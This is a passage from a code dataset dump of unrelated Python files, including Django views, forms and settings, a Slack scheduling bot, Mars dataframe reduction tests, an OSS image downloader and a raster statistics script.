major_exception()\n","sub_path":".bin/Scripts/system_setup.py","file_name":"system_setup.py","file_ext":"py","file_size_in_byte":14532,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"423630718","text":"from django.shortcuts import render\nfrom django.http import JsonResponse\nimport json\nimport datetime\nfrom .models import EvcloudVM, VMLimit, VMConfig\nfrom .utils import evcloud_operations\n\n# Create your views here.\n\ndef evcloud_list(request):\n if request.method == \"GET\":\n try:\n vms = evcloud_operations()\n image_list = vms.get_image_list()\n image_list_dict = {}\n for image in image_list.values():\n image_list_dict[image['id']] = image['name'] + ' ' + image['version']\n except:\n pass\n #image_list = ['centos7 64bit', 'win10 64bit', 'centos6 64bit', 'winxp 32bit', 'fedora28 64bit']\n user = request.user\n vm_list = EvcloudVM.objects.filter(user=user).filter(deleted=False).values()\n vm_list_dict = {}\n for i, vm in enumerate(vm_list):\n try:\n vm['vm_image_display'] = image_list_dict[int(vm['vm_image'])]\n except:\n vm['vm_image_display'] = '服务出错'\n vm['created_time_display'] = vm['created_time'].strftime(\"%Y-%m-%d\")\n vm['end_time_display'] = vm['end_time'].strftime(\"%Y-%m-%d\")\n vm_list_dict[i] = vm\n return render(request, 'evcloud_list.html', {'vm_list_dict':vm_list_dict})\n elif request.method == \"POST\":\n vms = evcloud_operations()\n vm_id = request.POST.get('vm_id')\n vm_operate = int(request.POST.get('vm_operate'))\n if vm_operate == 4:\n code, e = vms.delete(vm_id)\n status = 'delete'\n if code == 200:\n vm = EvcloudVM.objects.get(vm_id=vm_id)\n vm.deleted = True\n vm.save()\n elif vm_operate == 5:\n code, e = vms.create_vnc(vm_id)\n status = 'ok'\n elif vm_operate == 6:\n code, e = vms.get_status(vm_id)\n status = 'ok'\n elif 0 < vm_operate < 3:\n code, e = vms.operations(vm_id, vm_operate)\n status = '关机'\n else:\n code, e = vms.operations(vm_id, vm_operate)\n status = '开机'\n result = {\n 'code': code,\n 'status': status,\n 'e': e,\n }\n #print(e)\n return JsonResponse(data=result)\ndef evcloud_add(request):\n #print(request.method)\n user = request.user\n if request.method == \"GET\":\n try:\n vms = evcloud_operations()\n image_list = vms.get_image_list()\n except:\n image_list[0] = {'name': '服务出错'}\n pass\n config_list = VMConfig.objects.all().values()\n config_list_dict = {}\n for i, config in enumerate(config_list):\n config_list_dict[i] = config\n return render(request, 'evcloud_add.html', {'config_list_dict': config_list_dict,\n 'image_list': image_list,\n })\n\n elif request.method == \"POST\":\n try:\n limit = VMLimit.objects.get(user=user).limit\n except :\n VMLimit.objects.create(user=user)\n limit = VMLimit.objects.get(user=user).limit\n result = {}\n image = int(request.POST.get('image'))\n config_id = int(request.POST.get('configure'))\n config = VMConfig.objects.get(id=config_id)\n cpu = config.cpu\n mem = config.mem\n time = config.time * 30\n try:\n vm_number = EvcloudVM.objects.filter(user=user).filter(deleted=False).count()\n if vm_number >= limit:\n raise Exception('the number of VM exceed limit')\n vms = evcloud_operations()\n create_result = vms.create(image, cpu, mem, user.email)\n EvcloudVM.objects.create(vm_id=create_result['uuid'],\n user=user,\n end_time=datetime.datetime.now()+datetime.timedelta(days=time),\n vm_image=image,\n vm_cpu=cpu,\n vm_mem=mem,\n vm_ip=create_result['ipv4'],\n group_id=create_result['group_id'])\n #print(create_result)\n result['code'] = 200\n except Exception as e:\n result['code'] = 400\n print(e)\n result['error_text'] = str(e).encode('utf-8').decode('unicode_escape')\n return JsonResponse(data = result)\n else:\n return JsonResponse(data = 'error')","sub_path":"apps/evcloud/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4609,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"189611904","text":"# Union Find root method\ndef root(a,i):\n\twhile(a[i]!=i):\n\t\ti=a[i]\n\treturn i\n\ndef find(a,u,v):\n\tif root(a,u) == root(a,v):\n\t\treturn True\n\treturn False\n\ndef union(a,u,v):\n\trootu = root(a,u)\n\trootv = root(a,v)\n\ta[rootu] = rootv\n\nvertex=[0,1,2,3,4,5,6]\nedges=[(1,0),(1,3),(4,6),(2,6)]\nfor edge in edges:\n\tunion(vertex,edge[0],edge[1])\nprint(vertex)\nprint(find(vertex,1,5))","sub_path":"union_find_root.py","file_name":"union_find_root.py","file_ext":"py","file_size_in_byte":368,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"129209431","text":"import sys\nimport datetime\nfrom slackbot.bot import respond_to, listen_to\nsys.path.append('..')\nfrom application.google_calendar import get_upcoming_events\nfrom find_avairable_time import get_available_time\n\n@listen_to('飲みにいける日')\n@listen_to('呑みにいける日')\n@listen_to('のみにいける日')\n@listen_to('ひまな日')\ndef respond_schedule(message):\n\n calendar_ids = {'塩ホッケ': 'mchmng0grg5vb1q9pdahc2fui4@group.calendar.google.com',\n '大西': '9hsr2ngo831lbbq5pk52ujcicc@group.calendar.google.com',\n '耀太': 'sufgin9an1pmqgr6o24dks5q40@group.calendar.google.com'}\n john_events = get_upcoming_events(calendar_id=calendar_ids['塩ホッケ'], max_results=100)\n mary_events = get_upcoming_events(calendar_id=calendar_ids['大西'], max_results=100)\n mike_events = get_upcoming_events(calendar_id=calendar_ids['耀太'], max_results=100)\n\n from pprint import pprint\n min_time, max_time = datetime.time(18, 0), datetime.time(21, 0)\n intervals = get_available_time(min_time, max_time, john_events, mary_events, mike_events)\n free_list = []\n\n for date in sorted(intervals.keys()):\n for pair in intervals[date]:\n start,end = pair\n start_str = start.strftime('%m/%d %H:%M')\n end_str = end.strftime('%m/%d %H:%M')\n text = '\\r\\n' + start_str + \" ~ \" + end_str\n free_list.append(text)\n\n reply_schedule = ' '.join(free_list)\n reply_message = '\\r\\n' + \"3人の都合が合う日はこれです\" + reply_schedule\n message.reply(reply_message)\n\n@respond_to('おススメのお店')\n@respond_to('お勧めのお店')\n@respond_to('おススメの店')\n@respond_to('お勧めの店')\ndef respond_bar(message):\n reply_message2 = \"日本酒好きが多いですね\" + \"\\r\\n\" + \"ここがおススメですよ\" + \"\\r\\n\" + \"https://tabelog.com/osaka/A2701/A270101/27080955/\"\n message.reply(reply_message2)\n\n@respond_to('他のお店')\n@respond_to('他の店')\ndef respond_bar2(message):\n reply_message3 = \"たまにはピザなんてどうですか?\" + \"\\r\\n\" + \"ここもおススメですよ\" + \"\\r\\n\" + \"https://tabelog.com/osaka/A2701/A270101/27092761/\"\n message.reply(reply_message3)","sub_path":"application/plugins/slack.py","file_name":"slack.py","file_ext":"py","file_size_in_byte":2251,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"499736869","text":"# Copyright 1999-2018 Alibaba Group Holding Ltd.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nimport pandas as pd\nimport numpy as np\n\nfrom mars.tests.core import TestBase\nfrom mars.dataframe.datasource.series import from_pandas as from_pandas_series\nfrom mars.dataframe.datasource.dataframe import from_pandas as from_pandas_df\n\n\nclass Test(TestBase):\n def testSeriesSum(self):\n data = pd.Series(np.random.rand(20), index=[str(i) for i in range(20)], name='a')\n sum_df1 = from_pandas_series(data).sum()\n self.assertEqual(data.sum(), sum_df1.execute())\n\n sum_df2 = from_pandas_series(data, chunk_size=6).sum()\n self.assertAlmostEqual(data.sum(), sum_df2.execute())\n\n sum_df3 = from_pandas_series(data, chunk_size=3).sum()\n self.assertAlmostEqual(data.sum(), sum_df3.execute())\n\n sum_df4 = from_pandas_series(data, chunk_size=4).sum(axis='index')\n self.assertAlmostEqual(data.sum(axis='index'), sum_df4.execute())\n\n data = pd.Series(np.random.rand(20), name='a')\n data[0] = 0.1 # make sure not all elements are NAN\n data[data > 0.5] = np.nan\n sum_df1 = from_pandas_series(data, chunk_size=3).sum()\n self.assertAlmostEqual(data.sum(), sum_df1.execute())\n\n sum_df2 = from_pandas_series(data, chunk_size=3).sum(skipna=False)\n self.assertTrue(np.isnan(sum_df2.execute()))\n\n sum_df3 = from_pandas_series(data, chunk_size=3).sum(skipna=False, min_count=2)\n self.assertTrue(np.isnan(sum_df3.execute()))\n\n sum_df4 = from_pandas_series(data, chunk_size=3).sum(min_count=1)\n self.assertAlmostEqual(data.sum(min_count=1), sum_df4.execute())\n\n sum_df5 = from_pandas_series(data, chunk_size=3).sum(min_count=21)\n self.assertTrue(np.isnan(sum_df5.execute()))\n\n def testDataFrameSum(self):\n data = pd.DataFrame(np.random.rand(20, 10))\n sum_df1 = from_pandas_df(data).sum()\n pd.testing.assert_series_equal(data.sum(), sum_df1.execute())\n\n sum_df2 = from_pandas_df(data, chunk_size=3).sum()\n pd.testing.assert_series_equal(data.sum(), sum_df2.execute())\n\n sum_df3 = from_pandas_df(data, chunk_size=6).sum(axis='index', numeric_only=True)\n pd.testing.assert_series_equal(data.sum(axis='index', numeric_only=True), sum_df3.execute())\n\n sum_df4 = from_pandas_df(data, chunk_size=3).sum(axis=1)\n pd.testing.assert_series_equal(data.sum(axis=1), sum_df4.execute())\n\n # test null\n np_data = np.random.rand(20, 10)\n np_data[np_data > 0.6] = np.nan\n data = pd.DataFrame(np_data)\n\n sum_df1 = from_pandas_df(data, chunk_size=3).sum()\n pd.testing.assert_series_equal(data.sum(), sum_df1.execute())\n\n sum_df2 = from_pandas_df(data, chunk_size=3).sum(skipna=False)\n pd.testing.assert_series_equal(data.sum(skipna=False), sum_df2.execute())\n\n sum_df3 = from_pandas_df(data, chunk_size=3).sum(min_count=15)\n pd.testing.assert_series_equal(data.sum(min_count=15), sum_df3.execute())\n\n sum_df4 = from_pandas_df(data, chunk_size=3).sum(min_count=3)\n pd.testing.assert_series_equal(data.sum(min_count=3), sum_df4.execute())\n\n sum_df5 = from_pandas_df(data, chunk_size=3).sum(axis=1, min_count=3)\n pd.testing.assert_series_equal(data.sum(axis=1, min_count=3), sum_df5.execute())\n\n sum_df5 = from_pandas_df(data, chunk_size=3).sum(axis=1, min_count=8)\n pd.testing.assert_series_equal(data.sum(axis=1, min_count=8), sum_df5.execute())\n\n # test numeric_only\n data = pd.DataFrame(np.random.rand(10, 10), index=np.random.randint(-100, 100, size=(10,)),\n columns=[np.random.bytes(10) for _ in range(10)])\n sum_df1 = from_pandas_df(data, chunk_size=2).sum()\n pd.testing.assert_series_equal(data.sum(), sum_df1.execute())\n\n sum_df2 = from_pandas_df(data, chunk_size=6).sum(axis='index', numeric_only=True)\n pd.testing.assert_series_equal(data.sum(axis='index', numeric_only=True), sum_df2.execute())\n\n sum_df3 = from_pandas_df(data, chunk_size=3).sum(axis='columns')\n pd.testing.assert_series_equal(data.sum(axis='columns'), sum_df3.execute())\n\n data_dict = dict((str(i), np.random.rand(10)) for i in range(10))\n data_dict['string'] = [str(i) for i in range(10)]\n data_dict['bool'] = np.random.choice([True, False], (10,))\n data = pd.DataFrame(data_dict)\n sum_df = from_pandas_df(data, chunk_size=3).sum(axis='index', numeric_only=True)\n pd.testing.assert_series_equal(data.sum(axis='index', numeric_only=True), sum_df.execute())\n\n","sub_path":"mars/dataframe/reduction/tests/test_reduction_execute.py","file_name":"test_reduction_execute.py","file_ext":"py","file_size_in_byte":5148,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"289834374","text":"# -*- coding: utf-8 -*-\nimport logging\n\nfrom django.conf import settings\nfrom django.views.decorators.http import require_GET\nfrom future.utils import raise_with_traceback\n\nfrom luckyapi.logic.crowdfunding import (view_my_activitys_v2,\n view_other_activitys,\n view_activity_detail,\n view_activity_revealed,\n view_latest_activity,\n view_revealed_list)\nfrom luckycommon.sensor.sensor_handler import filter_apples, filter_gp\nfrom luckycommon.strategy import handler as strategy_handler\nfrom luckycommon.utils.api import token_required\nfrom luckycommon.utils.decorator import response_wrapper\nfrom luckycommon.utils.exceptions import (ParamError, AuthenticateError)\n\n_LOGGER = logging.getLogger('lucky')\n\nDEBUG_USER = settings.DEBUG_USER\n\n\n@require_GET\n@response_wrapper\ndef get_activity_detail(request, activity_id):\n \"\"\"\n get activity detail\n \"\"\"\n activity_detail = view_activity_detail(\n request.user_id, activity_id, use_cache=True)\n return activity_detail\n\n\n@require_GET\n@response_wrapper\ndef get_activity_revealed(request, activity_id):\n \"\"\"\n 查看商品的中奖信息\n \"\"\"\n activity_revealed = view_activity_revealed(activity_id)\n return activity_revealed\n\n\n@require_GET\n@response_wrapper\ndef get_latest_activity(request, template_id):\n \"\"\"\n 查看最新一期商品详情\n \"\"\"\n lite_only = int(request.GET.get('lite_only', 0))\n activity_detail = view_latest_activity(\n request.user_id, template_id, lite_only=lite_only)\n return activity_detail\n\n\n@require_GET\n@response_wrapper\ndef get_last_revealed(request, template_id):\n \"\"\"\n 往期揭晓\n get last winner of template\n \"\"\"\n try:\n page = int(request.GET.get('page', 0))\n size = int(request.GET.get('size', 0))\n except Exception as e:\n raise_with_traceback(ParamError(e))\n revealed_list, count = view_revealed_list(\n page, size, template_id, use_cache=True)\n data = {\n 'list': revealed_list,\n 'page': page if page > 0 else 1,\n 'size': len(revealed_list),\n 'total_count': count\n }\n return data\n\n\n@require_GET\n@response_wrapper\n@token_required\ndef get_my_activitys(request):\n \"\"\"\n 查看我的夺宝记录\n \"\"\"\n user_id = request.user_id\n if not user_id:\n raise AuthenticateError('not login')\n\n try:\n page = int(request.GET.get('page', 0))\n size = int(request.GET.get('size', 0))\n only_win = int(request.GET['win']) if request.GET.get('win') else 0\n status = int(request.GET['status']) if request.GET.get(\n 'status') else None\n except Exception as e:\n raise_with_traceback(ParamError(e))\n\n a_list, count = view_my_activitys_v2(user_id, page, size, only_win, status)\n data = {\n 'list': a_list,\n 'page': page if page > 0 else 1,\n 'size': size if size else count,\n 'total_count': count\n }\n return data\n\n\n@require_GET\n@response_wrapper\ndef get_other_activitys(request, user_id):\n \"\"\"\n 查看他人夺宝记录\n \"\"\"\n try:\n user_id = int(user_id)\n page = int(request.GET.get('page', 0))\n size = int(request.GET.get('size', 0))\n only_win = int(request.GET['win']) if request.GET.get('win') else 0\n status = int(request.GET['status']) if request.GET.get(\n 'status') else None\n except Exception as e:\n raise_with_traceback(ParamError(e))\n\n a_list, count = view_other_activitys(user_id, page, size, only_win, status)\n a_list = filter_apples(request, a_list)\n a_list = filter_gp(request, a_list)\n data = {\n 'list': a_list,\n 'total_count': count\n }\n return data\n\n\n@require_GET\n@response_wrapper\n@token_required\ndef get_activity_announce(request, activity_id):\n if request.user_id != DEBUG_USER:\n raise AuthenticateError()\n data = strategy_handler.fetch_announce_result(activity_id)\n return data\n","sub_path":"luckyapi/views/activity_v2.py","file_name":"activity_v2.py","file_ext":"py","file_size_in_byte":4115,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"132502933","text":"from django import forms\nfrom .models import Person, Project, Cost, Attachment, Horaire, Assignment, Time\n\n\n\nYEARS = [x for x in range(1980,2031)]\nYEAR_DATE = [x for x in range(2015,2031)]\n\n\nclass PersonForm(forms.ModelForm):\n class Meta:\n model = Person\n fields = [\n \"name\",\n \"name_short\",\n \"phone\",\n \"email\",\n \"IBAN\",\n \"birthday\",\n \"company\",\n \"company_short\",\n # \"country\",\n # \"city\",\n # \"zip_code\",\n # \"address\",\n # \"comment\",\n # \"agent\",\n # \"agent_short\",\n \"client\",\n \"model\",\n \"photographe\",\n \"make_up\",\n \"styling\",\n \"other\",\n \"comment_other\",\n # \"sedcard_cost\",\n # \"sedcard_payed\",\n # \"bank_account\",\n # \"website\"\n ]\n \n\nclass ProjectForm(forms.ModelForm):\n\n\n\n start = forms.DateField(widget=forms.SelectDateWidget(years=YEAR_DATE), label=\"Stardatum\")\n finish = forms.DateField(initial=\"2010-11-20\", widget=forms.SelectDateWidget(years=YEAR_DATE), label=\"Enddatum\")\n name = forms.CharField(required=True, widget=forms.TextInput(attrs={'class': 'special'}), initial=\"\", label=\"Projektname\")\n comment = forms.CharField(required=False, widget=forms.Textarea(attrs={\"rows\": 1, \"cols\": 22}), label=\"Komment\")\n other_description = forms.CharField(required=False, widget=forms.Textarea(attrs={\"rows\": 1, \"cols\": 22}), label=\"Anderer Beschreibung\")\n comment_address = forms.CharField(required=False, widget=forms.Textarea(attrs={\"rows\": 1, \"cols\": 22}), label=\"Adresskomment\")\n\n class Meta: \n model = Project\n fields = [\n 'name',\n 'client',\n 'start',\n 'finish',\n 'user',\n 'comment',\n 'sort',\n 'all_day',\n 'half_day',\n 'half_day_price_pro',\n 'all_day_price_pro',\n 'over_price_pro',\n 'all_in_price_pro',\n 'half_day_price_semipro',\n 'all_day_price_semipro',\n 'over_price_semipro',\n 'all_in_price_semipro',\n 'country',\n 'city',\n 'zip_code',\n 'address',\n 'comment_address',\n 'honorary_base',\n 'honorary_plus',\n 'quantity_models_honorary_plus',\n 'ms_price',\n 'ms_hours',\n 'requirement_price',\n 'requirement_hours',\n 'requisiten_price_for_each_model',\n 'other_title',\n 'other_description',\n 'other_price',\n 'other_hours',\n 'photo_price',\n 'photo_hours',\n 'tax',\n 'statut'\n ]\n\nclass CostForm(forms.ModelForm):\n date = forms.DateField(widget=forms.SelectDateWidget(years=YEAR_DATE), label=\"Datum\")\n comment = forms.CharField(required=False, widget=forms.Textarea(attrs={\"rows\": 1, \"cols\": 22}), label=\"Komment\")\n\n\n\n class Meta: \n model = Cost\n fields = [\n 'user',\n 'project',\n 'comment',\n 'date',\n 'amount',\n 'title',\n 'statut'\n ]\n\nclass AttachmentForm(forms.ModelForm):\n send_date = forms.DateField(widget=forms.SelectDateWidget(years=YEAR_DATE), label=\"Senddatum\")\n answer_date = forms.DateField(widget=forms.SelectDateWidget(years=YEAR_DATE), label=\"Antwortdatum\")\n comment_WG = forms.CharField(required=False, widget=forms.Textarea(attrs={\"rows\": 1, \"cols\": 22}), label=\"Komment wg\")\n comment_client = forms.CharField(required=False, widget=forms.Textarea(attrs={\"rows\": 1, \"cols\": 22}), label=\"Komment kunde\")\n\n\n class Meta: \n model = Attachment\n fields = [\n 'sort',\n 'file',\n 'send_date',\n 'answer_date',\n 'statut',\n 'comment_WG',\n 'comment_client',\n 'project',\n 'person'\n ]\n\nclass HoraireForm(forms.ModelForm):\n date = forms.DateField(widget=forms.SelectDateWidget(years=YEAR_DATE), label=\"Datum\")\n start_time = forms.TimeField(widget=forms.TimeInput(format='%I:%M %p',), label=\"Startdatum\")\n finish_time = forms.TimeField(widget=forms.TimeInput(format='%I:%M %p',), help_text=\"Enter a date between now and 4 weeks (default 3).\", label=\"Endedatum\")\n\n class Meta: \n model = Horaire\n fields = [\n 'assignment',\n 'date',\n 'start_time', \n 'finish_time'\n ]\n\nclass AssignmentForm(forms.ModelForm):\n\n def bla (request):\n project = get_object_or_404(Project, id=pk)\n projecto = self.request.project\n \n comment_WG = forms.CharField(required=False, widget=forms.Textarea(attrs={\"rows\": 1, \"cols\": 22}), label=\"Komment\")\n send_date = forms.DateField(widget=forms.SelectDateWidget(years=YEAR_DATE), label=\"Senddatum\")\n payment_date = forms.DateField(widget=forms.SelectDateWidget(years=YEAR_DATE), label=\"Bezhaldatum\")\n \n class Meta: \n model = Assignment\n fields = [\n 'project',\n 'person',\n 'model_type',\n 'travel_cost',\n 'hotel_cost',\n 'other_cost',\n 'comment_WG',\n 'statut',\n 'send_date',\n 'payment_date',\n 'total_price'\n ]\n\nclass TimeForm(forms.ModelForm):\n start_time = forms.TimeField(widget=forms.TimeInput(format='%I:%M %p',), label=\"Startdatum\")\n finish_time = forms.TimeField(widget=forms.TimeInput(format='%I:%M %p',), label=\"Enddatum\")\n date = forms.DateField(widget=forms.SelectDateWidget(years=YEAR_DATE), label=\"Datum\")\n comment = forms.CharField(required=False, widget=forms.Textarea(attrs={\"rows\": 1, \"cols\": 22}), label=\"Komment\")\n\n class Meta: \n model = Time\n fields = [\n 'title',\n 'user',\n 'comment',\n 'date',\n 'start_time',\n 'finish_time',\n 'project'\n ]","sub_path":"apli/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":6239,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"578727306","text":"#!/usr/bin/env python\n# filefunciton: 根据pid_type下载相应的图像文件\nimport os\nimport oss2\nimport sys\nimport pymysql\n\nclass OSSImg(object):\n def __init__(self):\n self.auth = oss2.Auth()\n self.bucket = oss2.Bucket( )\n self.conn = pymysql.connect( )\n \n def _get_img_urls(self, type_top_id):\n qry = 'select thumb_pic from product where type_top_id=%s and thumb_pic is not null'\n type_id = int(type_top_id)\n with self.conn.cursor() as cur:\n cur.execute(qry, type_id)\n qry_res = cur.fetchall()\n # print(qry_res) qry_res is a tuple (('56371eb3f18ec.jpg',), ('562f9bc14301d.jpg',), ('f2682dbb918f4cc39a3a6acef43e0b49.jpg',), ('562fba096c1fd.jpg',), ('562f9dac2eceb.jpg',), ('bee07bef7c114af58ddd3064292482b1.jpg',))\n picture_urls = qry_res\n return picture_urls\n\n def get_img(self, url, i):\n # url = '772fe290e7c2496db9a132fb13b2c350.jpg'\n url_path = 'products/Thumbs/'+url\n save_name = str(i) + '_'+ url\n try:\n self.bucket.get_object_to_file(url_path, save_name)\n except:\n print('Error')\n\nif __name__ == '__main__':\n ossimg = OSSImg()\n typeid = sys.argv[1]\n picture_urls = ossimg._get_img_urls(typeid)\n for i in range(len(picture_urls)):\n url = picture_urls[i][0]\n print(url)\n ossimg.get_img(url,i)\n","sub_path":"vgg16_regular/get_pidtype_product_img.py","file_name":"get_pidtype_product_img.py","file_ext":"py","file_size_in_byte":1391,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"194803943","text":"# Django settings for cms project.\nimport os\nfrom django.core.exceptions import SuspiciousOperation\nsettings_dir = os.path.dirname(__file__)\nSETTINGS_DIR = settings_dir\nROOT_DIR = os.path.join(\n os.path.abspath(\n os.path.join(SETTINGS_DIR, os.path.pardir),\n ),\n)\n\nMEDIA_URL = 'http://palewire.s3.amazonaws.com/'\nADMIN_MEDIA_PREFIX = 'http://palewire.s3.amazonaws.com/admin/'\nSTATIC_URL = '/static/'\n\ntry:\n from settings_dev import *\nexcept ImportError:\n from settings_prod import *\nTEMPLATE_DEBUG = DEBUG\n\nTIME_ZONE = 'America/Los_Angeles'\nUSE_TZ = False\nLANGUAGE_CODE = 'en-us'\nSITE_ID = 1\nUSE_I18N = True\n\nMEDIA_ROOT = os.path.join(ROOT_DIR, 'media')\nSTATIC_ROOT = os.path.join(ROOT_DIR, 'static')\n\nCACHE_BACKEND =\t'memcached://127.0.0.1:11211'\nCACHE_MIDDLEWARE_SECONDS = 60 * 5\nCACHE_MIDDLEWARE_KEY_PREFIX = ''\nCACHE_MIDDLEWARE_ANONYMOUS_ONLY = True\n\nHAYSTACK_SITECONF = 'coltrane.search_indexes'\nHAYSTACK_SEARCH_ENGINE = 'whoosh'\nHAYSTACK_WHOOSH_PATH = '/apps/palewire.com/whoosh/'\n\nMUNIN_ROOT = '/var/cache/munin/www/'\n\nMIDDLEWARE_CLASSES = (\n 'django.middleware.gzip.GZipMiddleware',\n 'toolbox.middleware.domains.MultipleProxyMiddleware',\n 'django.middleware.common.CommonMiddleware',\n 'toolbox.middleware.domains.DomainRedirectMiddleware',\n 'django.contrib.sessions.middleware.SessionMiddleware',\n 'django.middleware.csrf.CsrfViewMiddleware',\n 'django.contrib.messages.middleware.MessageMiddleware',\n 'django.contrib.auth.middleware.AuthenticationMiddleware',\n)\n\nROOT_URLCONF = 'project.urls'\n\nTEMPLATE_DIRS = (\n os.path.join(ROOT_DIR, 'templates/'),\n)\n\nTEMPLATE_LOADERS = (\n 'django.template.loaders.filesystem.Loader',\n 'django.template.loaders.app_directories.Loader',\n)\n\nSTATICFILES_DIRS = (\n os.path.join(ROOT_DIR, 'templates/static/'),\n)\n\nSTATICFILES_FINDERS = (\n 'django.contrib.staticfiles.finders.FileSystemFinder',\n 'django.contrib.staticfiles.finders.AppDirectoriesFinder',\n)\n\n\nTEMPLATE_CONTEXT_PROCESSORS = (\n \"django.contrib.auth.context_processors.auth\",\n \"django.core.context_processors.debug\",\n \"django.core.context_processors.i18n\",\n \"django.core.context_processors.media\",\n \"django.core.context_processors.static\",\n \"django.core.context_processors.request\",\n \"django.contrib.messages.context_processors.messages\",\n \"django.core.context_processors.csrf\",\n \"toolbox.context_processors.sites.current_site\",\n)\n\nINSTALLED_APPS = (\n 'django.contrib.auth',\n 'django.contrib.contenttypes',\n 'django.contrib.sessions',\n 'django.contrib.sites',\n 'django.contrib.admin',\n 'django.contrib.comments',\n 'django.contrib.sitemaps',\n 'django.contrib.humanize',\n 'django.contrib.staticfiles',\n # Blog\n 'coltrane',\n 'bona_fides',\n # Site extras and helpers\n 'correx',\n 'tagging',\n 'django_extensions',\n 'greeking',\n 'shortener',\n 'south',\n 'adminsortable',\n # NICAR-related apps\n 'nicar.polls',\n 'nicar.flu_map',\n # Goofy one-off apps\n 'wxwtf.questionheds',\n 'wxwtf.random_oscars_ballot',\n 'wxwtf.flushots',\n 'wxwtf.kennedy',\n)\n\n# Shortener settings\nSITE_NAME = 'palewi.re'\nSITE_BASE_URL = 'http://%s/!/' % SITE_NAME\n\n\ndef skip_suspicious_operations(record):\n if record.exc_info:\n exc_value = record.exc_info[1]\n if isinstance(exc_value, SuspiciousOperation):\n return False\n return True\n\n\nLOGGING = {\n 'version': 1,\n 'disable_existing_loggers': False,\n 'filters': {\n 'require_debug_false': {\n '()': 'django.utils.log.RequireDebugFalse'\n },\n 'skip_suspicious_operations': {\n '()': 'django.utils.log.CallbackFilter',\n 'callback': skip_suspicious_operations,\n },\n },\n 'handlers': {\n 'mail_admins': {\n 'level': 'ERROR',\n 'class': 'django.utils.log.AdminEmailHandler',\n 'filters': ['require_debug_false', 'skip_suspicious_operations'],\n },\n 'null': {\n 'level':'DEBUG',\n 'class':'django.utils.log.NullHandler',\n },\n 'console':{\n 'level':'DEBUG',\n 'class':'logging.StreamHandler',\n 'formatter': 'verbose'\n },\n 'logfile': {\n 'level':'DEBUG',\n 'class':'logging.handlers.RotatingFileHandler',\n 'filename': os.path.join(settings_dir, 'django.log'),\n 'maxBytes': 50000,\n 'backupCount': 2,\n 'formatter': 'verbose',\n },\n },\n 'formatters': {\n 'verbose': {\n 'format': '%(levelname)s|%(asctime)s|%(module)s|%(process)d|%(thread)d|%(message)s',\n 'datefmt' : \"%d/%b/%Y %H:%M:%S\"\n },\n 'simple': {\n 'format': '%(levelname)s|%(message)s'\n },\n },\n 'loggers': {\n 'django.request': {\n 'handlers': ['mail_admins'],\n 'level': 'ERROR',\n 'propagate': True,\n },\n 'coltrane': {\n 'handlers': ['console', 'logfile'],\n 'level': 'DEBUG',\n 'propagate': True,\n },\n 'wxwtf': {\n 'handlers': ['console', 'logfile'],\n 'level': 'DEBUG',\n 'propagate': True,\n },\n 'django.security.DisallowedHost': {\n 'handlers': ['null'],\n 'propagate': False,\n },\n }\n}\n\n\n# Django debug toolbar configuration\nif DEBUG_TOOLBAR:\n # Debugging toolbar middleware\n MIDDLEWARE_CLASSES += (\n 'debug_toolbar.middleware.DebugToolbarMiddleware',\n )\n # JavaScript panels for the deveopment debugging toolbar\n DEBUG_TOOLBAR_PANELS = (\n 'debug_toolbar.panels.versions.VersionsPanel',\n 'debug_toolbar.panels.timer.TimerPanel',\n 'debug_toolbar.panels.settings.SettingsPanel',\n 'debug_toolbar.panels.headers.HeadersPanel',\n 'debug_toolbar.panels.request.RequestPanel',\n 'debug_toolbar.panels.profiling.ProfilingPanel',\n 'debug_toolbar.panels.sql.SQLPanel',\n 'debug_toolbar.panels.staticfiles.StaticFilesPanel',\n 'debug_toolbar.panels.templates.TemplatesPanel',\n 'debug_toolbar.panels.cache.CachePanel',\n 'debug_toolbar.panels.signals.SignalsPanel',\n 'debug_toolbar.panels.logging.LoggingPanel',\n 'debug_toolbar.panels.redirects.RedirectsPanel',\n )\n # Debug toolbar app\n INSTALLED_APPS += ('debug_toolbar',)\n CONFIG_DEFAULTS = {\n 'INTERCEPT_REDIRECTS': False,\n }\n","sub_path":"project/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":6453,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"65167974","text":"import rasterio ###critical to import rasterio first or the whole thing segfaults\nfrom rasterstats import raster_stats\nimport fiona\nimport sys\n#import os\nimport json\nimport numpy as np\n#import pandas as pd\n\n\n\nprint(\"hello\") \n#print(os.getcwd())\nshapefile = sys.argv[1]\nraster_file = sys.argv[2]\njson_output_file = sys.argv[3]\nstat_text = sys.argv[4]\nall_touched_param = False\nif len(sys.argv)>4:\n\tall_touched_param = True\n\nstat_array = stat_text.split(\",\")\n\n#shapefile = \"wi_005.shp\"\n#raster_file = \"cropscape.tif\"\nprint(shapefile)\nprint(raster_file)\nfull_lyr = fiona.open(shapefile)\nn = 100000\nall_stats = []\n\nfor i in range(0, len(full_lyr), n):\n\tlyr = full_lyr[i:i+n]\n\tfeatures = (x for x in lyr)\n\t#features = lyr[1]\n\n\t#can we subset in groups of 30k here?\n\n\tdef unique_values(x):\n\t\tvals = np.unique(x)\n\t\tvals = vals[~np.isnan(vals)]\n\t\t#x_arrstr = np.char.mod('%i', vals)\n\t\t#try just removing the .join below\n\t\t#x_str = 